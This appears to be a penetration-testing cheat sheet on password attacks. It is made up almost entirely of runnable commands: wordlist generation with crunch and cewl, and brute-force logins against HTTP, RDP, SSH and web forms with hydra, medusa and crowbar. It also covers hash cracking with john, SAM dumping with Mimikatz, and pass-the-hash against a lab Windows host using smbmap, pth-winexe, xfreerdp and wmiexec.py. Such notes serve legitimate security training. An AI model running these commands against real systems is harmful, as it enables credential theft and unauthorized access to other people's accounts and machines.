
Password Attacks

Generate Wordlists

  • /usr/share/wordlists

  • /usr/share/seclists

crunch

crunch 5 5 -t ,@@^% -o password.txt
crunch 10 10 0123456789 -t 2343@@@@@@ -o passwd.txt

Using /usr/share/crunch/charset.lst

crunch 4 4 -f /usr/share/crunch/charset.lst lalpha -o crunch.txt

Placeholder Character Translation

  • @ Lower case alpha characters

  • , Upper case alpha characters

  • % Numeric characters

  • ^ Special characters including space

cewl

cewl $url -m 6 -w wordlists.txt

john.conf Rules

Rules are defined in /etc/john/john.conf under the [List.Rules:Wordlist] section

john --wordlist=passwd.txt --rules --stdout > pass-rules.txt

Common Services

HTTP htaccess Attack

How To Set Up Password Authentication with Apache on Ubuntu 14.04

medusa -h 127.0.0.1 -u kali -P ./pass.txt -M http -m DIR:/

RDP Attack

crowbar -b rdp -s 192.168.11.135/32 -u windows_10_1903_x64 -C ./pass.txt -n 4

SSH Attack

hydra -l kali -P ./pass.txt ssh://127.0.0.1

HTTP POST Attack

hydra -l admin -P ./pass.txt 192.168.11.135 http-form-post "/admin.php:user=admin&pass=^PASS^:INVALID CREDENTIALS" -vV -f

Leveraging Password Hashes

Retrieving Password Hashes

How to identify hash types

Generate a password hash for a new user, then identify and crack it

openssl passwd -1 -salt hades leecybersec > hash.txt
hashid -m hash.txt
john --wordlist=./pass.txt hash.txt

Passing the Hash in Windows

Intro to Windows hashes

Mimikatz.exe

privilege::debug
token::elevate
lsadump::sam

Pass-The-Hash

Using smbmap

List the contents of the Desktop folder

smbmap -H 192.168.11.135 -u windows_10_1903_x64 -p 'aad3b435b51404eeaad3b435b51404ee:68bdacb06923faed9dc32661308f594e' -r 'Users\windows_10_1903_x64\Desktop'

Download the file 41542.c from the Windows 10 host

smbmap -H 192.168.11.135 -u windows_10_1903_x64 -p 'aad3b435b51404eeaad3b435b51404ee:68bdacb06923faed9dc32661308f594e' --download 'Users\windows_10_1903_x64\Desktop\41542.c'

pth-winexe

pth-winexe -U windows_10_1903_x64%aad3b435b51404eeaad3b435b51404ee:68bdacb06923faed9dc32661308f594e //192.168.11.135 cmd

pth-wmis

pth-wmis -U windows_10_1903_x64%aad3b435b51404eeaad3b435b51404ee:68bdacb06923faed9dc32661308f594e //192.168.11.135 cmd

xfreerdp

xfreerdp /v:192.168.11.135 /u:windows_10_1903_x64 /pth:68bdacb06923faed9dc32661308f594e

wmiexec.py

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:68bdacb06923faed9dc32661308f594e windows_10_1903_x64@192.168.11.135

Password Cracking

john --wordlist=./pass.txt hash.txt
unshadow passwd shadow > hash
john --rules --wordlist=./pass.txt hash

https://hashcat.net